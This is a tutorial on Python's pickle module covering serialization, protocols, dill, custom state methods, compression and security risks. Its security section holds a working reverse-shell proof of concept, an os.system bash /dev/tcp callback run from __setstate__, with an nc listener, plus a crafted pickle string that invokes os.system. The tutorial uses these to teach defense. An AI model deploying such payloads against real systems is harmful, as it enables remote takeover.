The Python pickle Module: How to Persist Objects in Python

by Davide Mastromatteo

As a developer, you may sometimes need to send complex object hierarchies over a network or save the internal state of your objects to a disk or database for later use. To accomplish this, you can use a process called serialization, which is fully supported by the standard library thanks to the Python pickle module.

In this tutorial, you’ll learn:

  • What it means to serialize and deserialize an object
  • Which modules you can use to serialize objects in Python
  • Which kinds of objects can be serialized with the Python pickle module
  • How to use the Python pickle module to serialize object hierarchies
  • What the risks are when deserializing an object from an untrusted source

Let’s get pickling!

Serialization in Python

The serialization process is a way to convert a data structure into a linear form that can be stored or transmitted over a network.

In Python, serialization allows you to take a complex object structure and transform it into a stream of bytes that can be saved to a disk or sent over a network. You may also see this process referred to as marshalling. The reverse process, which takes a stream of bytes and converts it back into a data structure, is called deserialization or unmarshalling.

Serialization can be used in a lot of different situations. One of the most common uses is saving the state of a neural network after the training phase so that you can use it later without having to redo the training.

Python offers three different modules in the standard library that allow you to serialize and deserialize objects:

  1. The marshal module
  2. The json module
  3. The pickle module

In addition, Python supports XML, which you can also use to serialize objects.

The marshal module is the oldest of the three listed above. It exists mainly to read and write the compiled bytecode of Python modules, or the .pyc files you get when the interpreter imports a Python module. So, even though you can use marshal to serialize some of your objects, it’s not recommended.

The json module is the newest of the three. It allows you to work with standard JSON files. JSON is a very convenient and widely used format for data exchange.

There are several reasons to choose the JSON format: It’s human readable and language independent, and it’s lighter than XML. With the json module, you can serialize and deserialize several standard Python types:

  • bool
  • dict
  • int
  • float
  • list
  • str
  • tuple
  • None

The Python pickle module is another way to serialize and deserialize objects in Python. It differs from the json module in that it serializes objects in a binary format, which means the result is not human readable. However, it’s also faster and it works with many more Python types right out of the box, including your custom-defined objects.
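To make the difference between the two modules concrete, here is a minimal sketch that serializes the same data with both. The record dictionary and its keys are made up for illustration and don’t come from the tutorial:

```python
import json
import pickle

# Hypothetical sample data containing a tuple and a set.
record = {"name": "sensor-1", "position": (3, 4), "tags": {"a", "b"}}

# pickle round-trips the tuple and the set unchanged.
restored = pickle.loads(pickle.dumps(record))
print(restored == record)  # True
print(type(restored["position"]))  # <class 'tuple'>

# JSON has no set type, so serializing the same dictionary fails.
try:
    json.dumps(record)
except TypeError as error:
    print(f"json failed: {error}")

# Without the set, json works, but the tuple comes back as a list.
json_safe = {"name": "sensor-1", "position": (3, 4)}
print(json.loads(json.dumps(json_safe)))  # {'name': 'sensor-1', 'position': [3, 4]}
```

The JSON output is readable text that other languages can parse, while the pickled bytes preserve Python-specific types.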

Note: From now on, you’ll see the terms pickling and unpickling used to refer to serializing and deserializing with the Python pickle module.

So, you have several different ways to serialize and deserialize objects in Python. But which one should you use? The short answer is that there’s no one-size-fits-all solution. It all depends on your use case.

Here are three general guidelines for deciding which approach to use:

  1. Don’t use the marshal module. It’s used mainly by the interpreter, and the official documentation warns that the Python maintainers may modify the format in backward-incompatible ways.

  2. The json module and XML are good choices if you need interoperability with different languages or a human-readable format.

  3. The Python pickle module is a better choice for all the remaining use cases. If you don’t need a human-readable format or a standard interoperable format, or if you need to serialize custom objects, then go with pickle.

Inside the Python pickle Module

The Python pickle module basically consists of four functions:

  1. pickle.dump(obj, file, protocol=None, *, fix_imports=True, buffer_callback=None)
  2. pickle.dumps(obj, protocol=None, *, fix_imports=True, buffer_callback=None)
  3. pickle.load(file, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)
  4. pickle.loads(bytes_object, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)

The first two functions are used during the pickling process, and the other two are used during unpickling. The only difference between dump() and dumps() is that the first writes the serialization result to a file, whereas the second returns it as a bytes object.

To differentiate dumps() from dump(), it’s helpful to remember that the s at the end of the function name stands for string, a name that dates back to when pickles were returned as strings. In Python 3, the result is a bytes object. The same concept also applies to load() and loads(): The first one reads a file to start the unpickling process, and the second one operates on a bytes object.
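As a rough illustration of the two pairs of functions, the sketch below pickles the same object once to bytes and once to a file. The settings dictionary and the settings.pkl file name are placeholders chosen for this example:

```python
import pickle
import tempfile
from pathlib import Path

# Hypothetical data to persist.
settings = {"theme": "dark", "recent_files": ["a.txt", "b.txt"], "zoom": 1.25}

# dumps() and loads() work with an in-memory bytes object.
as_bytes = pickle.dumps(settings)
print(type(as_bytes))  # <class 'bytes'>
from_bytes = pickle.loads(as_bytes)

# dump() and load() work with a file opened in binary mode.
with tempfile.TemporaryDirectory() as folder:
    path = Path(folder) / "settings.pkl"
    with open(path, "wb") as file:
        pickle.dump(settings, file)
    with open(path, "rb") as file:
        from_file = pickle.load(file)

print(from_bytes == from_file == settings)  # True
```

Note that the file has to be opened in binary mode ("wb" and "rb") because pickled data is bytes, not text.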

Consider the following example. Say you have a custom-defined class named example_class with several different attributes, each of a different type:

  • a_number
  • a_string
  • a_dict
  • a_list
  • a_tuple

The example below shows how you can instantiate the class and pickle the instance to get a bytes object. After pickling the instance, you can change the value of its attributes without affecting the pickled bytes. You can then unpickle the pickled bytes into another variable, restoring a copy of the previously pickled instance:

Python
# pickling.py
import pickle

class example_class:
    a_number = 35
    a_string = "hey"
    a_list = [1, 2, 3]
    a_dict = {"first": "a", "second": 2, "third": [1, 2, 3]}
    a_tuple = (22, 23)

my_object = example_class()

my_pickled_object = pickle.dumps(my_object)  # Pickling the object
print(f"This is my pickled object:\n{my_pickled_object}\n")

my_object.a_dict = None

my_unpickled_object = pickle.loads(my_pickled_object)  # Unpickling the object
print(f"This is a_dict of the unpickled object:\n{my_unpickled_object.a_dict}\n")

In the example above, you create an instance of example_class and serialize it with pickle. This produces a single bytes object with the serialized result:

Shell
$ python pickling.py
This is my pickled object:
b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.'

This is a_dict of the unpickled object:
{'first': 'a', 'second': 2, 'third': [1, 2, 3]}

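The pickling process ends correctly, storing your instance in this bytes object: b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.' After the pickling process ends, you modify your original object by setting the attribute a_dict to None.

Finally, you unpickle the bytes to a completely new instance. What you get is a copy of your original object from the time that the pickling process began. Note that the attributes in this example are defined on the class rather than on the instance, so the pickle above contains only a reference to example_class, and the unpickled instance reads a_dict from the class definition. When the attributes are set on the instance, for example in .__init__(), their values are stored in the pickle and unpickling gives you a deep copy of the object structure.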
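The sketch below shows which attributes actually end up in the pickle. It assumes a hypothetical Example class that isn’t part of the tutorial, with one attribute defined on the class and two set in .__init__():

```python
import pickle

class Example:  # hypothetical class, used only for this illustration
    shared = "class attribute"  # lives on the class, so it is not stored in the pickle

    def __init__(self):
        # Instance attributes are stored in the instance's .__dict__ and get pickled.
        self.a_number = 35
        self.a_dict = {"first": "a", "third": [1, 2, 3]}

original = Example()
pickled = pickle.dumps(original)

# Mutate the original after pickling, including a nested list.
original.a_dict["first"] = "changed"
original.a_dict["third"].append(4)

restored = pickle.loads(pickled)
print(restored.a_dict)  # {'first': 'a', 'third': [1, 2, 3]}
print(restored.a_dict is original.a_dict)  # False
print(b"class attribute" in pickled)  # False
print(restored.shared)  # class attribute
```

The restored instance keeps the values from the moment of pickling, while shared is looked up on the class again when you access it.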

Protocol Formats of the Python pickle Module

As mentioned above, the pickle module is Python-specific, and the result of a pickling process can be read only by another Python program. But even if you’re working with Python, it’s important to know that the pickle module has evolved over time.

This means that if you’ve pickled an object with a specific version of Python, then you may not be able to unpickle it with an older version. The compatibility depends on the protocol version that you used for the pickling process.

There are currently six different protocols that the Python pickle module can use. The higher the protocol version, the more recent the Python interpreter needs to be for unpickling.

  1. Protocol version 0 was the first version. Unlike later protocols, it’s human readable.
  2. Protocol version 1 was the first binary format.
  3. Protocol version 2 was introduced in Python 2.3.
  4. Protocol version 3 was added in Python 3.0. It can’t be unpickled by Python 2.x.
  5. Protocol version 4 was added in Python 3.4. It features support for a wider range of object sizes and types and is the default protocol starting with Python 3.8.
  6. Protocol version 5 was added in Python 3.8. It features support for out-of-band data and improved speeds for in-band data.

Note: Newer versions of the protocol offer more features and improvements but are limited to higher versions of the interpreter. Be sure to consider this when choosing which protocol to use.

To identify the highest protocol that your interpreter supports, you can check the value of the pickle.HIGHEST_PROTOCOL attribute.

To choose a specific protocol, you need to specify the protocol version when you invoke dump() or dumps(). If you don’t specify a protocol, then your interpreter will use the default version specified in the pickle.DEFAULT_PROTOCOL attribute. You don’t need to specify a protocol for load() or loads() because the protocol version is detected automatically when unpickling.
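Here is a short sketch of how you might inspect and select a protocol. The data dictionary is a placeholder, and the printed protocol numbers depend on the interpreter you run it with:

```python
import pickle

data = {"key": "value", "numbers": [1, 2, 3]}  # hypothetical sample data

# Both values depend on the Python version running this code.
print(f"Highest protocol: {pickle.HIGHEST_PROTOCOL}")
print(f"Default protocol: {pickle.DEFAULT_PROTOCOL}")

# Protocol 0 produces printable output; newer protocols are binary.
oldest = pickle.dumps(data, protocol=0)
newest = pickle.dumps(data, protocol=pickle.HIGHEST_PROTOCOL)
print(oldest)

# From protocol 2 on, a pickle starts with the byte 0x80 followed by
# the protocol number.
print(newest[0] == 0x80, newest[1])

# loads() takes no protocol argument because it detects the version itself.
print(pickle.loads(oldest) == pickle.loads(newest) == data)  # True
```

If the pickle has to be read by an older interpreter, pass the lowest protocol that both sides support instead of pickle.HIGHEST_PROTOCOL.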

Picklable and Unpicklable Types

You’ve already learned that the Python pickle module can serialize many more types than the json module. However, not everything is picklable. The list of unpicklable objects includes database connections, opened network sockets, running threads, and others.
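To see what this looks like in practice, the following sketch tries to pickle a few such objects. The in-memory SQLite connection stands in for a database connection, and the thread lock and generator are extra illustrations chosen for this example:

```python
import pickle
import sqlite3
import threading

# Hypothetical stand-ins for objects that hold external or runtime state.
candidates = {
    "database connection": sqlite3.connect(":memory:"),
    "thread lock": threading.Lock(),
    "generator": (number for number in range(3)),
}

failures = {}
for label, obj in candidates.items():
    try:
        pickle.dumps(obj)
    except (TypeError, pickle.PicklingError) as error:
        # Record and report why each object could not be pickled.
        failures[label] = error
        print(f"{label}: {error}")

candidates["database connection"].close()
```

Each of these objects is tied to resources that only make sense inside the running process, which is why pickle refuses to serialize them.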

If you find yourself faced with an unpicklable object, then there are a couple of things that you can do. The first option is to use a third-party library such as dill.

The dill module extends the capabilities of pickle. According to the official documentation, it lets you serialize less common types like functions with yields, nested functions, lambdas, and many others.

To test this module, you can try to pickle a lambda function:

Python
# pickling_error.py
import pickle

square = lambda x: x * x

my_pickle = pickle.dumps(square)

If you try to run this program, then you will get an exception because the Python pickle module can’t serialize a lambda function:

Shell
$ python pickling_error.py
Traceback (most recent call last):
  File "pickling_error.py", line 6, in <module>
    my_pickle = pickle.dumps(square)
_pickle.PicklingError: Can't pickle <function <lambda> at 0x10cd52cb0>: attribute lookup <lambda> on __main__ failed
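The "attribute lookup" part of the error message hints at the reason: pickle stores functions by reference, as a module name plus a function name, and a lambda has no name that can be looked up again. The sketch below contrasts the two cases, using math.sqrt as an arbitrary example of a named function:

```python
import math
import pickle

# A named function in an importable module is pickled as a reference,
# so unpickling returns the very same function object.
pickled_sqrt = pickle.dumps(math.sqrt)
print(pickle.loads(pickled_sqrt) is math.sqrt)  # True

# A lambda is named "<lambda>", which pickle can't look up by name.
square = lambda x: x * x
try:
    pickle.dumps(square)
    lambda_failed = False
except (pickle.PicklingError, AttributeError) as error:
    lambda_failed = True
    print(f"Could not pickle the lambda: {error}")
```

Because only the reference is stored, the function’s module must also be importable in the program that unpickles the data.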

Now try replacing the Python pickle module with dill to see if there’s any difference:

Python
# pickling_dill.py
import dill

square = lambda x: x * x
my_pickle = dill.dumps(square)
print(my_pickle)

If you run this code, then you’ll see that the dill module serializes the lambda without returning an error:

Shell
$ python pickling_dill.py
b'\x80\x03cdill._dill\n_create_function\nq\x00(cdill._dill\n_load_type\nq\x01X\x08\x00\x00\x00CodeTypeq\x02\x85q\x03Rq\x04(K\x01K\x00K\x01K\x02KCC\x08|\x00|\x00\x14\x00S\x00q\x05N\x85q\x06)X\x01\x00\x00\x00xq\x07\x85q\x08X\x10\x00\x00\x00pickling_dill.pyq\tX\t\x00\x00\x00squareq\nK\x04C\x00q\x0b))tq\x0cRq\rc__builtin__\n__main__\nh\nNN}q\x0eNtq\x0fRq\x10.'

Another interesting feature of dill is that it can even serialize an entire interpreter session. Here’s an example:

Python
>>> square = lambda x: x * x
>>> a = square(35)
>>> import math
>>> b = math.sqrt(484)
>>> import dill
>>> dill.dump_session('test.pkl')
>>> exit()

In this example, you start the interpreter, import a module, and define a lambda function along with a couple of other variables. You then import the dill module and invoke dump_session() to serialize the entire session.

If everything goes okay, then you should get a test.pkl file in your current directory:

Shell
$ ls test.pkl
4 -rw-r--r--@ 1 dave  staff  439 Feb  3 10:52 test.pkl

Now you can start a new instance of the interpreter and load the test.pkl file to restore your last session:

Python
>>> globals().items()
dict_items([('__name__', '__main__'), ('__doc__', None), ('__package__', None), ('__loader__', <class '_frozen_importlib.BuiltinImporter'>), ('__spec__', None), ('__annotations__', {}), ('__builtins__', <module 'builtins' (built-in)>)])
>>> import dill
>>> dill.load_session('test.pkl')
>>> globals().items()
dict_items([('__name__', '__main__'), ('__doc__', None), ('__package__', None), ('__loader__', <class '_frozen_importlib.BuiltinImporter'>), ('__spec__', None), ('__annotations__', {}), ('__builtins__', <module 'builtins' (built-in)>), ('dill', <module 'dill' from '/usr/local/lib/python3.7/site-packages/dill/__init__.py'>), ('square', <function <lambda> at 0x10a013a70>), ('a', 1225), ('math', <module 'math' from '/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/lib-dynload/math.cpython-37m-darwin.so'>), ('b', 22.0)])
>>> a
1225
>>> b
22.0
>>> square
<function <lambda> at 0x10a013a70>

The first globals().items() statement demonstrates that the interpreter is in the initial state. This means that you need to import the dill module and call load_session() to restore your serialized interpreter session.

Note: Before you use dill instead of pickle, keep in mind that dill is not included in the standard library of the Python interpreter and is typically slower than pickle.

Even though dill lets you serialize a wider range of objects than pickle, it can’t solve every serialization problem that you may have. If you need to serialize an object that contains a database connection, for example, then you’re in for a tough time because it’s an unserializable object even for dill.

So, how can you solve this problem?

The solution in this case is to exclude the object from the serialization process and to reinitialize the connection after the object is deserialized.

You can use __getstate__() to define what should be included in the pickling process. This method allows you to specify what you want to pickle. If you don’t override __getstate__(), then the instance’s .__dict__ will be used by default.

In the following example, you’ll see how you can define a class with several attributes and exclude one attribute from serialization with __getstate__():

Python
# custom_pickling.py
import pickle

class foobar:
    def __init__(self):
        self.a = 35
        self.b = "test"
        self.c = lambda x: x * x

    def __getstate__(self):
        attributes = self.__dict__.copy()
        del attributes['c']
        return attributes

my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)

print(my_new_instance.__dict__)

In this example, you create an object with three attributes. Since one attribute is a lambda, the object is unpicklable with the standard pickle module.

To address this issue, you specify what to pickle with __getstate__(). You first clone the entire __dict__ of the instance to have all the attributes defined in the class, and then you manually remove the unpicklable c attribute.

If you run this example and then deserialize the object, then you’ll see that the new instance doesn’t contain the c attribute:

Shell
$ python custom_pickling.py
{'a': 35, 'b': 'test'}

But what if you wanted to do some additional initializations while unpickling, say by adding the excluded c object back to the deserialized instance? You can accomplish this with __setstate__():

Python
# custom_unpickling.py
import pickle

class foobar:
    def __init__(self):
        self.a = 35
        self.b = "test"
        self.c = lambda x: x * x

    def __getstate__(self):
        attributes = self.__dict__.copy()
        del attributes['c']
        return attributes

    def __setstate__(self, state):
        self.__dict__ = state
        self.c = lambda x: x * x

my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)
print(my_new_instance.__dict__)

By recreating the excluded c object inside __setstate__(), you ensure that it appears in the .__dict__ of the unpickled instance.
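The same pair of methods can handle the database connection case mentioned earlier. The following is only a sketch under stated assumptions: the Repository class and its attribute names are hypothetical, and SQLite stands in for whatever database you actually use:

```python
import pickle
import sqlite3

class Repository:  # hypothetical class for illustration
    def __init__(self, database_path):
        self.database_path = database_path
        self.connection = sqlite3.connect(database_path)

    def __getstate__(self):
        # Copy the instance state and leave out the unpicklable connection.
        state = self.__dict__.copy()
        del state["connection"]
        return state

    def __setstate__(self, state):
        # Restore the pickled attributes, then open a fresh connection.
        self.__dict__.update(state)
        self.connection = sqlite3.connect(self.database_path)

repo = Repository(":memory:")
clone = pickle.loads(pickle.dumps(repo))

print(clone.database_path)  # :memory:
print(clone.connection.execute("SELECT 1").fetchone())  # (1,)
```

Keep in mind that only the information needed to reconnect is pickled. With an in-memory database like the one above, the new connection points to a new, empty database.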

Compression of Pickled Objects

Although the pickle data format is a compact binary representation of an object structure, you can still optimize your pickled data by compressing it with bzip2 or gzip.

To compress pickled data with bzip2, you can use the bz2 module provided in the standard library.

In the following example, you’ll take a string, pickle it, and then compress it using the bz2 library:

Python
>>> import pickle
>>> import bz2
>>> my_string = """Per me si va ne la città dolente,
... per me si va ne l'etterno dolore,
... per me si va tra la perduta gente.
... Giustizia mosse il mio alto fattore:
... fecemi la divina podestate,
... la somma sapienza e 'l primo amore;
... dinanzi a me non fuor cose create
... se non etterne, e io etterno duro.
... Lasciate ogne speranza, voi ch'intrate."""
>>> pickled = pickle.dumps(my_string)
>>> compressed = bz2.compress(pickled)
>>> len(my_string)
315
>>> len(compressed)
259

When using compression, bear in mind that smaller files come at the cost of a slower process.
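To get the object back, you reverse the steps: decompress first, then unpickle. This sketch shows the full round trip with both bz2 and gzip, using a deliberately repetitive string as sample data:

```python
import bz2
import gzip
import pickle

# Hypothetical, highly repetitive sample data that compresses well.
text = "Lasciate ogne speranza, voi ch'intrate. " * 200

pickled = pickle.dumps(text)
with_bz2 = bz2.compress(pickled)
with_gzip = gzip.compress(pickled)

# The exact sizes depend on the data and the Python version.
print(len(pickled), len(with_bz2), len(with_gzip))

# Decompress first, then unpickle.
restored = pickle.loads(bz2.decompress(with_bz2))
print(restored == text)  # True
```

How much you gain depends heavily on the data. Small or random-looking payloads may barely shrink at all.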

Security Concerns With the Python pickle Module

You now know how to use the pickle module to serialize and deserialize objects in Python. The serialization process is very convenient when you need to save your object’s state to disk or to transmit it over a network.

However, there’s one more thing you need to know about the Python pickle module: It’s not secure. Do you remember the discussion of __setstate__()? Well, that method is great for doing more initialization while unpickling, but it can also be used to execute arbitrary code during the unpickling process!

So, what can you do to reduce this risk?

Sadly, not much. The rule of thumb is to never unpickle data that comes from an untrusted source or is transmitted over an insecure network. In order to prevent man-in-the-middle attacks, it’s a good idea to use libraries such as hmac to sign the data and ensure it hasn’t been tampered with.
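As a rough sketch of the signing idea, the code below prepends an HMAC-SHA256 signature to the pickled bytes and checks it before unpickling. The SECRET_KEY value and the two helper function names are assumptions made for this example, and both sides need to share the key over a secure channel:

```python
import hashlib
import hmac
import pickle

# Hypothetical shared secret; in practice, load it from a secure location.
SECRET_KEY = b"replace-with-a-real-secret"
SIGNATURE_SIZE = hashlib.sha256().digest_size  # 32 bytes

def sign_and_pickle(obj):
    """Pickle obj and prepend an HMAC-SHA256 signature of the payload."""
    payload = pickle.dumps(obj)
    signature = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    return signature + payload

def verify_and_unpickle(message):
    """Unpickle the payload only if its signature matches."""
    signature, payload = message[:SIGNATURE_SIZE], message[SIGNATURE_SIZE:]
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(signature, expected):
        raise ValueError("Signature mismatch: refusing to unpickle")
    return pickle.loads(payload)

message = sign_and_pickle({"user": "dave", "score": 22})
print(verify_and_unpickle(message))  # {'user': 'dave', 'score': 22}

# Flip one bit in the payload to simulate tampering in transit.
tampered = message[:-1] + bytes([message[-1] ^ 0x01])
try:
    verify_and_unpickle(tampered)
except ValueError as error:
    print(error)  # Signature mismatch: refusing to unpickle
```

Signing only proves that the data comes from someone who holds the key. It doesn’t make unpickling safe if the sender itself can’t be trusted.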

The following example illustrates how unpickling a tampered pickle could expose your system to attackers, even giving them a working remote shell:

Python
# remote.py
import pickle
import os

class foobar:
    def __init__(self):
        pass

    def __getstate__(self):
        return self.__dict__

    def __setstate__(self, state):
        # The attack is from 192.168.1.10
        # The attacker is listening on port 8080
        os.system('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.1.10/8080 0>&1"')

my_foobar = foobar()
my_pickle = pickle.dumps(my_foobar)
my_unpickle = pickle.loads(my_pickle)

In this example, the unpickling process executes __setstate__(), which executes a Bash command to open a remote shell to the 192.168.1.10 machine on port 8080.

Here’s how you can safely test this script on your Mac or your Linux box. First, open the terminal and use the nc command to listen for a connection to port 8080:

Shell
$ nc -l 8080

This will be the attacker terminal. If everything works, then the command will seem to hang.

Next, open another terminal on the same computer (or on any other computer on the network) and execute the Python code above for unpickling the malicious code. Be sure to change the IP address in the code to your attacking terminal’s IP address. In my example, the attacker’s IP address is 192.168.1.10.

By executing this code, the victim will expose a shell to the attacker:

Shell
$ python remote.py

If everything works, a Bash shell will appear on the attacking console. This console can now operate directly on the attacked system:

Shell
$ nc -l 8080
bash: no job control in this shell

The default interactive shell is now zsh.
To update your account to use zsh, please run `chsh -s /bin/zsh`.
For more details, please visit https://support.apple.com/kb/HT208050.
bash-3.2$

So, let me repeat this critical point once again: Do not use the pickle module to deserialize objects from untrusted sources!
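If you can’t avoid unpickling data you don’t fully control, one way to limit the damage is to restrict which globals the unpickler may load by overriding Unpickler.find_class(). The sketch below follows the approach described in the official pickle documentation. The SAFE_BUILTINS allowlist is an assumption that you would adapt to your own data:

```python
import builtins
import io
import pickle

# Assumed allowlist of harmless built-in names; adjust it to your needs.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Only allow safe names from the builtins module.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        # Forbid everything else.
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def restricted_loads(data):
    """Work like pickle.loads(), but with restricted globals."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

print(restricted_loads(pickle.dumps([1, 2, range(15)])))  # [1, 2, range(0, 15)]

# A hand-written pickle that would call os.system() is rejected.
try:
    restricted_loads(b"cos\nsystem\n(S'echo hello world'\ntR.")
except pickle.UnpicklingError as error:
    print(error)
```

This reduces the attack surface but isn’t a complete defense, so the advice above still applies: prefer a format such as JSON for data from untrusted sources.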

Conclusion

You now know how to use the Python pickle module to convert an object hierarchy to a stream of bytes that can be saved to a disk or transmitted over a network. You also know that the deserialization process in Python must be used with care since unpickling something that comes from an untrusted source can be extremely dangerous.

In this tutorial, you’ve learned:

  • What it means to serialize and deserialize an object
  • Which modules you can use to serialize objects in Python
  • Which kinds of objects can be serialized with the Python pickle module
  • How to use the Python pickle module to serialize object hierarchies
  • What the risks are of unpickling from an untrusted source

With this knowledge, you’re well equipped to persist your objects using the Python pickle module. As an added bonus, you’re ready to explain the dangers of deserializing malicious pickles to your friends and coworkers.

If you have any questions, then leave a comment down below or contact me on Twitter!


About Davide Mastromatteo

Developer and editor of “the Python Corner”. Blood donor, Apple user, Python and Swift addicted. NFL, Rugby and Chess lover. Constantly hungry and foolish.
